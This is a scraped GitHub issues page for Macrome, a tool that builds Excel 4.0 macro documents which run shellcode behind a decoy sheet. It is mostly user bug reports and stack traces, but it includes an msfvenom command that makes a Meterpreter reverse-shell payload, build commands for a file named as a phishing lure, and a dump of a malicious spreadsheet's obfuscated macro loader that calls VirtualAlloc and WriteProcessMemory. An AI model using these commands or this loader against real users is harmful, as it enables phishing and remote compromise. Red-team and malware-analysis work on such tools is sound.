michaelweber / macrome Goto Github PK

Does not work on office16 and 2019. x64 bit.

A crash occurs and it exits.

my command:

 ./Macrome build --decoy-document Docs/decoy_document.xls --payload Docs/popcalc.bin --payload64-bit Docs/popcalc64.bin

build file:
poc.zip

msfvenom -a x86 -b '\x00' -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=1123 EXITFUNC=thread -f raw > t86.bin
dotnet Macrome.dll build --decoy-document decoy_document.xls --payload t86.bin

When I open output.xls, it crashes when I enable macros

Decoy documents should be able to have any number of sheets - right now it's essentially hard coded to assume the sheet is in position 1. This should be fixed.

Build arg like :.\Macrome.exe build --decoy-document 1.xls --payload payload.bin --payload-method Base64 --method ArgumentSubroutines --password VelvetSweatshop --output-file-name ReadyToPhish11.xls on win11,x64 version

Macro provided by Excelntdonut using -- obfuscate on excelntdonut, says formula is too long maximum character 255

Hi. Great work! Does it need a specific version of dotnet sdk installed? I installed the latest one for windows on a Windows 10 VM and built it without issues. When I run the DLL with the command "dotnet macrome.dll --build etc etc etc..." I get an error stating that the version 2.0 is not installed on the machine and it gives me the URL to download it. It's no longer supported but I guess I can finde it somewhere but the question is "do I really need it?". Thanks!

Hi,

I tried to used - and get error about format of cells - I take screenshots:

https://ibb.co/TBR5bP5
https://ibb.co/HNScKb1

then GoTo and contents of cell with error are

=FORMULA($FE$512;$A$1)

Command for generate - very basic:

Macrome.exe build --decoy-document decoy_document.xls --payload popcalc.bin --output-file-name CharSubroutine-Macro_calc32.xls

OS version and Excel - Windows 10, Excel 2016 32bit.

I do not know what else to add, except for what I can do PoC from the article https://outflank.nl/blog/2018/10/06/old-school-evil-excel-4-0-macros-xlm/ for calc32 or for Metasploit - on the same machine and Excel .

first thanks for sharing such great tool, but it crushes when using cobalstrike RAW Shellcode any idea why thanks

like id =1 , blankGraph.
in ms document , record enum begin at 6.................
can u guys propose some help infomation about where these record name (and field info) from.....thanks for this code inspire

I have no idea why this happens, but if you use the --password flag, your decoy document can't have a normal embedded image. To get around this my example uses a tiled background, but that's not something you're going to use in a common phishing lure.

how to use this with putty than popcalc or metalsploit payload generated?

Hello @michaelweber first of all thanks for this amazing tool!
I am playing around with this tool and testing locally and all works and now when im onto Macros section, i read it can import your own created macros.

My macro_example.txt is this one :
=ALERT("Excel document is outdated")
=QUIT()

Macrome.dll build --decoy-document decoy_document.xls --payload macro_example.txt --payload-type Macro and i get this error:

Unhandled exception: System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation. ---> System.InvalidOperationException: Sequence contains no elements

As it uses a basic very simple macro as you can see and i cant get it working if you can give me any clue or anything i would appreciate it, thanks @michaelweber

Hi,

Auto_open never triggers in Excel 2019 32 Bit (Language: Turkish) version.

I have tried it with both Macrome and the test macro below with International Macro Sheet. I am also sending the sample file attached.

=EXEC("notepad.exe")
=HALT()

test-4.0.zip

Do you have any advice?

I get the following errors when trying to dump a malicious spreadsheet:

C:\Users\jm460\Downloads\macrome>Macrome.exe dump --path C:\Users\jm460\Downloads\macrome\deobfuscated.xls
BoundSheet8 (0x10 bytes) - flags: 0x0 | SheetType: Macrosheet | HiddenState: Visible | Name [unicode=False]: qUKYONz;
BoundSheet8 (0xE bytes) - flags: 0x0 | SheetType: Worksheet | HiddenState: Visible | Name [unicode=False]: Sheet1
BIFF RecordType: SupBook - Length: 4
BIFF RecordType: ExternSheet - Length: 14
Lbl (0x1D bytes) - flags: 0xB | fBuiltin: False | fHidden: True | Name [unicode=False]: _xlfn.BITXOR | Formula: #NAME?
Lbl (0x17 bytes) - flags: 0x0 | fBuiltin: False | fHidden: False | Name [unicode=False]: ajeZFUwb
Lbl (0x20 bytes) - flags: 0x20 | fBuiltin: True | fHidden: False | Name [unicode=False]: Auto_Open1uto_Open1 !AUTO_OPEN! | Formula: qUKYONz;!A1
Lbl (0x1E bytes) - flags: 0xC | fBuiltin: False | fHidden: False | Name [unicode=False]: Button144_Click
Lbl (0x1E bytes) - flags: 0xC | fBuiltin: False | fHidden: False | Name [unicode=False]: Button145_Click
Lbl (0x1E bytes) - flags: 0xC | fBuiltin: False | fHidden: False | Name [unicode=False]: Button146_Click
Lbl (0x1E bytes) - flags: 0xC | fBuiltin: False | fHidden: False | Name [unicode=False]: Button147_Click
Lbl (0x1E bytes) - flags: 0xC | fBuiltin: False | fHidden: False | Name [unicode=False]: Button148_Click
Lbl (0x1E bytes) - flags: 0xC | fBuiltin: False | fHidden: False | Name [unicode=False]: Button149_Click
Lbl (0x17 bytes) - flags: 0x0 | fBuiltin: False | fHidden: False | Name [unicode=False]: cecvdVub
Lbl (0x17 bytes) - flags: 0x0 | fBuiltin: False | fHidden: False | Name [unicode=False]: ikXOTAkJ
Lbl (0x1B bytes) - flags: 0x0 | fBuiltin: False | fHidden: False | Name [unicode=False]: JIpHQ | Formula: qUKYONz;!F1
Lbl (0x15 bytes) - flags: 0x0 | fBuiltin: False | fHidden: False | Name [unicode=False]: KtyKQp
Lbl (0x15 bytes) - flags: 0x0 | fBuiltin: False | fHidden: False | Name [unicode=False]: viaBBg
Formula[A1]: ACTIVATE("qUKYONz;")
Formula[F1]: ARGUMENT("KtyKQp",2)
Formula[A2]: JIpHQ("=RE"&"GIS"&"TER(CHAR(109)&CHAR(115)&CHAR(118)&CHAR(99)&CHAR(114)&CHAR(116), CHAR(103)&CHAR(101)&CHAR(116)&CHAR(101)&CHAR(110)&CHAR(118), ""CC"", ""ajeZFUwb"", , 1, 9)")
Formula[F2]: FORMULA(KtyKQp,F3)
Formula[A3]: ajeZFUwb("USERDOMAIN")
Formula[A4]: IF(ISNUMBER(SEARCH("64",GET.WORKSPACE(1))))
Formula[F4]: FORMULA("",F3)
Formula[A5]: JIpHQ("=RE"&"GIS"&"TER(CHAR(75)&CHAR(69)&CHAR(82)&CHAR(78)&CHAR(69)&CHAR(76)&""32"", CHAR(86)&CHAR(105)&CHAR(114)&CHAR(116)&CHAR(117)&CHAR(97)&CHAR(108)&CHAR(65)&CHAR(108)&CHAR(108)&CHAR(111)&CHAR(99), ""JJJJJ"", ""cecvdVub"", , 1, 9)")
Formula[F5]: RETURN()
Formula[A6]: SET.VALUE(C6,0)
Formula[A7]: SET.VALUE(C7,65536)
Formula[A8]: WHILE(C6=0)
Formula[A9]: SET.VALUE(C7,C7+8192)
Formula[A10]: cecvdVub(C7,1024,12288,64)
Formula[A11]: SET.VALUE(C6,A10)
Formula[A12]: NEXT()
Formula[A13]: JIpHQ("=RE"&"GIS"&"TER(CHAR(75)&CHAR(69)&CHAR(82)&CHAR(78)&CHAR(69)&CHAR(76)&""32"",CHAR(87)&CHAR(114)&CHAR(105)&CHAR(116)&CHAR(101)&CHAR(80)&CHAR(114)&""oces""&CHAR(115)&CHAR(77)&CHAR(101)&CHAR(109)&CHAR(111)&CHAR(114)&CHAR(121),""JJJCJE"",""viaBBg"",,1,9)")
Unhandled exception: System.Reflection.TargetInvocationException: Exception has been thrown by the target of an invocation. ---> System.InvalidOperationException: Stack empty.
at System.Collections.Generic.Stack1.ThrowForEmptyStack() at System.Collections.Generic.Stack1.Pop()
at b2xtranslator.xls.XlsFileFormat.PtgHelper.GetFormulaStringInner(Stack1& ptgStack, Boolean showAttributes) in C:\Users\Weber\source\repos\michaelweber\Macrome\b2xtranslator\Xls\XlsFileFormat\PtgHelper.cs:line 255 at b2xtranslator.xls.XlsFileFormat.PtgHelper.GetFormulaString(Stack1 ptgStack, Boolean showAttributes) in C:\Users\Weber\source\repos\michaelweber\Macrome\b2xtranslator\Xls\XlsFileFormat\PtgHelper.cs:line 370
at b2xtranslator.Spreadsheet.XlsFileFormat.Records.Formula.ToFormulaString(Boolean showAttributes) in C:\Users\Weber\source\repos\michaelweber\Macrome\b2xtranslator\Xls\XlsFileFormat\Records\Formula.cs:line 261
at Macrome.BiffRecordExtensions.ToHexDumpString(BiffRecord record, Int32 maxLength, Boolean showAttrInfo) in C:\Users\Weber\source\repos\michaelweber\Macrome\BiffRecordExtensions.cs:line 85
at Macrome.Program.Dump(FileInfo path, Boolean dumpAll, Boolean showAttrInfo, Boolean dumpHexBytes) in C:\Users\Weber\source\repos\michaelweber\Macrome\Program.cs:line 85
--- End of inner exception stack trace ---
at System.RuntimeMethodHandle.InvokeMethod(Object target, Object[] arguments, Signature sig, Boolean constructor)
at System.Reflection.RuntimeMethodInfo.UnsafeInvokeInternal(Object obj, Object[] parameters, Object[] arguments)
at System.CommandLine.Invocation.ModelBindingCommandHandler.d__8.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at System.CommandLine.Invocation.InvocationPipeline.<>c__DisplayClass4_0.<b__0>d.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at System.CommandLine.Builder.CommandLineBuilderExtensions.<>c.<b__20_0>d.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at System.CommandLine.Builder.CommandLineBuilderExtensions.<>c__DisplayClass15_0.<b__0>d.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at System.CommandLine.Builder.CommandLineBuilderExtensions.<>c__DisplayClass24_0.<b__0>d.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at System.CommandLine.Builder.CommandLineBuilderExtensions.<>c__DisplayClass22_0.<b__0>d.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at System.CommandLine.Builder.CommandLineBuilderExtensions.<>c.<b__21_0>d.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at System.CommandLine.Builder.CommandLineBuilderExtensions.<>c.<b__19_0>d.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at System.CommandLine.Builder.CommandLineBuilderExtensions.<>c.<b__11_0>d.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at System.CommandLine.Builder.CommandLineBuilderExtensions.<>c.<b__10_0>d.MoveNext()
--- End of stack trace from previous location where exception was thrown ---
at System.Runtime.ExceptionServices.ExceptionDispatchInfo.Throw()
at System.Runtime.CompilerServices.TaskAwaiter.HandleNonSuccessAndDebuggerNotification(Task task)
at System.CommandLine.Builder.CommandLineBuilderExtensions.<>c__DisplayClass13_0.<b__0>d.MoveNext()

It appears that some of my Unicode fun for obfuscating the Auto_Open label doesn't fly on the MacOS version of office. It should be possible to disable the obfuscation (which currently ALWAYS happens regardless of what you call your label) with a flag. I suspect this also is breaking auto_open functionality for some international language settings.